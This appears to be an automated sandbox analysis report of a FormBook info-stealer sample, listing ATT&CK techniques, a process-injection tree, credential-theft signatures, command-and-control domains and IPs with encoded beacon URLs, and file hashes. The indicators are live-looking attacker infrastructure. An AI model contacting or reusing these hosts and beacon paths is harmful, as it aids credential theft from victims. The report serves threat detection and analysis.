            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Encrypted for Impact
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 51 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1448090
            Sample: F2024-202202.exe
            Startdate: 27/05/2024
            Architecture: WINDOWS
            Score: 100

            Node 2 (start)
              DNS/IP: www.waldil.online; www.sweet777.work; 3 other IPs or domains
              Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Yara detected FormBook; 3 other signatures
              started: node 10
            Node 10: F2024-202202.exe 4
              Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
              started: node 13
            Node 13: svchost.exe
              Signatures: Maps a DLL or memory area into another process
              injected: node 16
            Node 16: HCyQCFLUGWqlxNRVXC.exe (injected)
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              started: node 19
            Node 19: openfiles.exe 13
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
              injected: node 22
              started: node 26
            Node 22: HCyQCFLUGWqlxNRVXC.exe (injected)
              DNS/IP: www.kguyreoalpha.shop 43.132.225.97, ports 49717, 49718, 49719, LILLY-ASUS, Japan; www.make-l.ru 194.58.112.174, ports 49713, 49714, 49715, AS-REGRU, Russian Federation; www.goodroothealth.com 66.113.136.229, ports 49711, 80, AFFINITY-FTLUS, United States
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            Node 26: firefox.exe

            Source | Detection | Scanner | Label | Link
            F2024-202202.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            www.goodroothealth.com | 0% | Virustotal | | Browse
            www.kguyreoalpha.shop | 0% | Virustotal | | Browse
            www.make-l.ru | 1% | Virustotal | | Browse
            www.waldil.online | 3% | Virustotal | | Browse
            www.sweet777.work | 1% | Virustotal | | Browse
            Source | Detection | Scanner | Label | Link
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            http://www.make-l.ru/0so0/ | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
            http://www.kguyreoalpha.shop/0so0/ | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
            http://www.goodroothealth.com/0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 | 0% | Avira URL Cloud | safe |
            http://www.kguyreoalpha.shop/0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
            http://www.kguyreoalpha.shop/0so0/ | 1% | Virustotal | | Browse
            http://www.kguyreoalpha.shop | 0% | Avira URL Cloud | safe |
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
            http://www.make-l.ru/0so0/ | 1% | Virustotal | | Browse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
            http://www.kguyreoalpha.shop | 0% | Virustotal | | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.goodroothealth.com | 66.113.136.229 | true | true | | unknown
            www.kguyreoalpha.shop | 43.132.225.97 | true | true | | unknown
            www.make-l.ru | 194.58.112.174 | true | true | | unknown
            www.waldil.online | 188.114.96.3 | true | true | | unknown
            www.sweet777.work | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.make-l.ru/0so0/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            http://www.kguyreoalpha.shop/0so0/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            http://www.goodroothealth.com/0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 | true | Avira URL Cloud: safe | unknown
            http://www.kguyreoalpha.shop/0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://ac.ecosia.org/autocomplete?q= | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/chrome_newtab | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            https://duckduckgo.com/ac/?q= | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            http://www.kguyreoalpha.shop | HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.ecosia.org/newtab/ | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            43.132.225.97 | www.kguyreoalpha.shop | Japan | 4249 | LILLY-ASUS | true
            194.58.112.174 | www.make-l.ru | Russian Federation | 197695 | AS-REGRU | true
            66.113.136.229 | www.goodroothealth.com | United States | 3064 | AFFINITY-FTLUS | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1448090
            Start date and time:2024-05-27 19:14:04 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 31s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:F2024-202202.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/5@5/3
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 58
            • Number of non-executed functions: 268
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target HCyQCFLUGWqlxNRVXC.exe, PID 768 because it is empty
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            Time | Type | Description
            13:16:00 | API Interceptor | 2046362x Sleep call for process: openfiles.exe modified
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            43.132.225.97 | 2300-02998.exe | Get hash | malicious | FormBook | Browse | www.kguyreoalpha.shop/0so0/
            194.58.112.174 | 2023-1392 Martin y Ruiz Recambio Surtekpdf.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.businessbots.shop/wbob/
            194.58.112.174 | justiicante transferencia compra vvda-pdf.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.businessbots.shop/wbob/
            194.58.112.174 | Curriculum Vitae Catalina Munoz.exe | Get hash | malicious | FormBook | Browse | www.theppelin.online/zxqv/
            194.58.112.174 | inquiry EBS# 82785.exe | Get hash | malicious | FormBook | Browse | www.yamlex.ru/ji0p/
            194.58.112.174 | 2300-02998.exe | Get hash | malicious | FormBook | Browse | www.make-l.ru/0so0/
            194.58.112.174 | PI No 20000814C.exe | Get hash | malicious | FormBook | Browse | www.kubanci.ru/3nn5/
            194.58.112.174 | quotation.exe | Get hash | malicious | FormBook | Browse | www.yamlex.ru/ji0p/
            194.58.112.174 | SSDQ115980924.exe | Get hash | malicious | FormBook | Browse | www.kubanci.ru/3nn5/
            194.58.112.174 | Payment invoice.exe | Get hash | malicious | FormBook | Browse | www.yamlex.ru/ji0p/
            194.58.112.174 | quote.exe | Get hash | malicious | FormBook | Browse | www.yamlex.ru/ji0p/
            66.113.136.229 | 2300-02998.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/0so0/
            66.113.136.229 | BoTl06PDGl.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/mrpm/?YtSp=JrQp6zU81nJt6Z&sR=M2jzcz4nEwyEV8mFq2hxwTmA3BRAoJVOjLM4xGlScogEw2I8xnL1d/UUSirNlJBZ3pBqCzpPjgSTEbz0PmvJ+iWVoqcDQ4zAyFhznaR0kDMawW2Z3nL3KP819m+kZlQ2nQ==
            66.113.136.229 | ixtUbGW9Vx.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/0so0/
            66.113.136.229 | XJBYhQFCGi.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/m8cr/
            66.113.136.229 | A6en1Q0smW.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/pdac/
            66.113.136.229 | 33BMmt58Bj.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/dhra/
            66.113.136.229 | SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/m8cr/
            66.113.136.229 | gMCSnfJRqp.exe | Get hash | malicious | FormBook | Browse | www.goodroothealth.com/m8cr/
            66.113.136.229 | Transferencia.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.fmusique.com/pgdv/?WLkuGdhD=uQ12DhZ6P0PPSP1sQKctiC1ycKy2mHADrS3rDHFCVKTeYgmXnOzK9a7SEQ64Y5UC08EQhocHk/371pO8nL0aHLaxSVuiBnnzug==&wr=UmpJ5
            66.113.136.229 | payment_confirmation.exe | Get hash | malicious | FormBook | Browse | www.fmusique.com/5h58/?t1lp=Y2fIKny1YS6Hj2ugxACm/Z2ngbjf60D+i6hucaGxtoAaSrv1AcY6hwawS71s2chZb6U+wtJFrSj4cJI90WvVa46X92fqcQD6Qg==&kfjb=6SukICCXjjKrzLi
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            www.kguyreoalpha.shop | 2300-02998.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | Lowe_list0605002024.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse | 43.132.225.97
            www.kguyreoalpha.shop | Xbkrgp2HX73cvU3.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | ixtUbGW9Vx.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | file.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | SOgv6zN9CC.exe | Get hash | malicious | FormBook, PureLog Stealer, XWorm | Browse | 43.132.225.97
            www.kguyreoalpha.shop | file.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | Search.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 43.132.225.97
            www.kguyreoalpha.shop | rx5aqVjdjJKDgYx.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.kguyreoalpha.shop | file.exe | Get hash | malicious | FormBook | Browse | 43.132.225.97
            www.goodroothealth.com | 2300-02998.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | BoTl06PDGl.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | ixtUbGW9Vx.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | XJBYhQFCGi.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | A6en1Q0smW.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | 33BMmt58Bj.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.goodroothealth.com | gMCSnfJRqp.exe | Get hash | malicious | FormBook | Browse | 66.113.136.229
            www.waldil.online | Lowe_list0605002024.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse | 104.21.94.235
            www.waldil.online | DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe | Get hash | malicious | FormBook | Browse | 104.21.94.235
            www.waldil.online | QMrtQYunxY.exe | Get hash | malicious | FormBook | Browse | 172.67.141.125
            www.waldil.online | f4CdNDrJp8.exe | Get hash | malicious | FormBook | Browse | 104.21.94.235
            www.waldil.online | IMAGE_0010.exe | Get hash | malicious | FormBook | Browse | 172.67.141.125
            www.waldil.online | LPO-582-AL SAFA.exe | Get hash | malicious | FormBook | Browse | 104.21.94.235
            www.waldil.online | manufacturer this requirements.exe | Get hash | malicious | FormBook | Browse | 104.21.94.235
            www.make-l.ru | 2300-02998.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            www.make-l.ru | ixtUbGW9Vx.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            www.make-l.ru | vRrSdSTG0c.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            www.make-l.ru | our order 6076297.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            www.make-l.ru | PO 1402-16 AH.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 194.58.112.174
            www.make-l.ru | Quotation MEW Tender 2024.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 194.58.112.174
            www.make-l.ru | N270-10-MR-1671-01.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 194.58.112.174
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            LILLY-ASUS | nzKl7TpAyk.elf | Get hash | malicious | Unknown | Browse | 43.134.110.125
            LILLY-ASUS | C4zDQjrSzj.elf | Get hash | malicious | Unknown | Browse | 40.216.33.52
            LILLY-ASUS | Mt5VyD087r.elf | Get hash | malicious | Mirai | Browse | 40.53.69.62
            LILLY-ASUS | PaRWfF3x5K.elf | Get hash | malicious | Unknown | Browse | 43.60.124.133
            LILLY-ASUS | VgF8V1Q5pg.elf | Get hash | malicious | Unknown | Browse | 40.4.106.169
            LILLY-ASUS | sKQrQ9KjPJ.elf | Get hash | malicious | Mirai | Browse | 43.72.210.64
            LILLY-ASUS | i6bCVSCWc1.elf | Get hash | malicious | Mirai | Browse | 40.52.70.4
            LILLY-ASUS | 8PRlezZSuB.elf | Get hash | malicious | Unknown | Browse | 42.65.116.139
            LILLY-ASUS | om4SVF6n0I.elf | Get hash | malicious | Mirai | Browse | 43.54.183.75
            LILLY-ASUS | Xe3eO9R1Ra.elf | Get hash | malicious | Mirai | Browse | 40.3.252.151
            AS-REGRU | 2023-1392 Martin y Ruiz Recambio Surtekpdf.exe | Get hash | malicious | FormBook, GuLoader | Browse | 194.58.112.174
            AS-REGRU | justiicante transferencia compra vvda-pdf.exe | Get hash | malicious | FormBook, GuLoader | Browse | 194.58.112.174
            AS-REGRU | 4TH HIRE SOA REMITTANCE_USD280,000.exe | Get hash | malicious | FormBook | Browse | 31.31.196.16
            AS-REGRU | Tenuto.exe | Get hash | malicious | FormBook, GuLoader, LummaC Stealer | Browse | 37.140.192.90
            AS-REGRU | Curriculum Vitae Catalina Munoz.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            AS-REGRU | inquiry EBS# 82785.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            AS-REGRU | PAYMENT COPY.exe | Get hash | malicious | FormBook | Browse | 31.31.198.106
            AS-REGRU | la.bot.mips.elf | Get hash | malicious | Unknown | Browse | 193.124.16.254
            AS-REGRU | 2300-02998.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
            AS-REGRU | FRA.0038222.exe | Get hash | malicious | FormBook, GuLoader | Browse | 37.140.192.90
            AFFINITY-FTLUS | la.bot.arm7.elf | Get hash | malicious | Unknown | Browse | 216.219.155.128
            AFFINITY-FTLUS | KkD4QJWEyx.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | qBotA88SDV.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | dDZYqd2t3k.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | ofWnd1cfmU.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | Jus1mkDZsJ.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | KgBEq4YGpw.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | mzdWUcvUU2.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | LJ6BZHggzR.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            AFFINITY-FTLUS | GIPlLTG4sS.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 64.23.184.217
            No context
            No context
            Process:C:\Windows\SysWOW64\openfiles.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.121297215059106
            Encrypted:false
            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
            MD5:D87270D0039ED3A5A72E7082EA71E305
            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
            Malicious:false
            Reputation:high, very likely benign file
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:ASCII text, with very long lines (29758), with no line terminators
            Category:dropped
            Size (bytes):29758
            Entropy (8bit):3.556554661937332
            Encrypted:false
            SSDEEP:768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I563b4vfF3if6gyf:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RP
            MD5:C3AAC484CBA8FCB4EE40790A4D3C17BE
            SHA1:380DADB9599AEA92FC3FA398AF1D336D4CBF5892
            SHA-256:3A07F6408CD2BBCC8C79A74CE15D9751E8561589CD4692828644DEF81E53106E
            SHA-512:FB255F16EF71950169B76EADDB72B853891147EE44A0CE7EEDB8368A98B4B016998D3450214636489F1A4B3088C5E2ADE7A5EE9FFF287B1A300D6F93F2DCAB64
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):276480
            Entropy (8bit):7.99548355351693
            Encrypted:true
            SSDEEP:6144:MHxZe+vrFBlDg0fX/91qC2LhXKmRXRLM/0vhbQqRsdrsTjaq4:4/e+vrFw0fX/91qC2LhXKmBNA0vJQqRy
            MD5:CCFFDA8415140708F2D4EF3CADFCF33B
            SHA1:546D1494756AF1AF24FC33959BD80E6462B6CA8C
            SHA-256:0C3C3DF6FC7A238D16C9FD93189512CC53734880DFD9C97EDD1802CC57058688
            SHA-512:CB0FD3E61E19FD47577ED241FDAFC1D08A7012A26C0E3008D76A142DF5290CC2387B650D3256BA57B44EEAE16A9E6794D3DD0315E5E192660F8CCF07F5524AFA
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):9976
            Entropy (8bit):7.577055608820035
            Encrypted:false
            SSDEEP:192:jLNAVE7gSydzvu8I6Yoa4qyedm9Y4+0q7j79sDCRCnEuY30J:HNAygSydzvuRDnnyedm9Y46jhJmEhg
            MD5:DA4BD12CB25650B5B176775CE1452E87
            SHA1:206E91FAA3FC8FBF71E26599BCAF19257B1626D7
            SHA-256:26B1D60B1F4FECC7BAE9D52937CE01E3A072CC59726B71F690A1F8F8BBB84953
            SHA-512:213EAEE3E33E3654A2B05B37F1DFF4773603DC635FB2FFBA8B3A414B2336080311D033CB6197862F79F8E6633DDC33F24AE77C798650E957144D99CF6EB6BF98
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):276480
            Entropy (8bit):7.99548355351693
            Encrypted:true
            SSDEEP:6144:MHxZe+vrFBlDg0fX/91qC2LhXKmRXRLM/0vhbQqRsdrsTjaq4:4/e+vrFw0fX/91qC2LhXKmBNA0vJQqRy
            MD5:CCFFDA8415140708F2D4EF3CADFCF33B
            SHA1:546D1494756AF1AF24FC33959BD80E6462B6CA8C
            SHA-256:0C3C3DF6FC7A238D16C9FD93189512CC53734880DFD9C97EDD1802CC57058688
            SHA-512:CB0FD3E61E19FD47577ED241FDAFC1D08A7012A26C0E3008D76A142DF5290CC2387B650D3256BA57B44EEAE16A9E6794D3DD0315E5E192660F8CCF07F5524AFA
            Malicious:false
            Reputation:low
            Preview:..|..SXQI`..E.....EE...MM...HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQ.8X8BK.TM._.g.S..o.#P7h#*>.J9Ul7S4#W"e$Ur%A e"Wd...q$W<]bY?Pi8VEF0RWMOL..$/.e1..eX+.(...l%!.H.y+^.R..uX?..=Q2pX1.F0RW4NEKi.HS.PH8,r..2ZM8VEF0.W6ONJ2DHu\QI8X8LT2Z.,VEF RW4.AK9D.SXAI8X:LT4ZM8VEF0TW4NEK9DH.\QI:X8LT2ZO8..F0BW4^EK9DXSXAI8X8LT"ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZcL3=20RW.kAK9THSXwM8X(LT2ZM8VEF0RW4NeK9$HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.114003419458171
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:F2024-202202.exe
            File size:1'165'312 bytes
            MD5:0e7042c3256ba6a60bee8cf70a18958c
            SHA1:06cd123e5cf1784d0b29415ebf6f58d4d4b21847
            SHA256:85c1c78badee38d490bb6cb18e5f2fd19dbe97355af3d6823ac3b1c93f63f751
            SHA512:43556dc18d7de6d7f6cca055ab478058d23138aa4843947bf3463cd54c91f2f2b2d566b2ec73cb3ef585c58355a37855923cec01d65e0c2ec3b5374f7738508a
            SSDEEP:24576:oAHnh+eWsN3skA4RV1Hom2KXMmHa+6pNNRXgUm05:vh+ZkldoPK8Ya+6pnRD
            TLSH:9345AD0273D1C036FFAB92739B6AF20556BD79254133852F13982DB9B8701B2267E763
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
            Icon Hash:aaf3e3e3938382a0
            Entrypoint:0x42800a
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
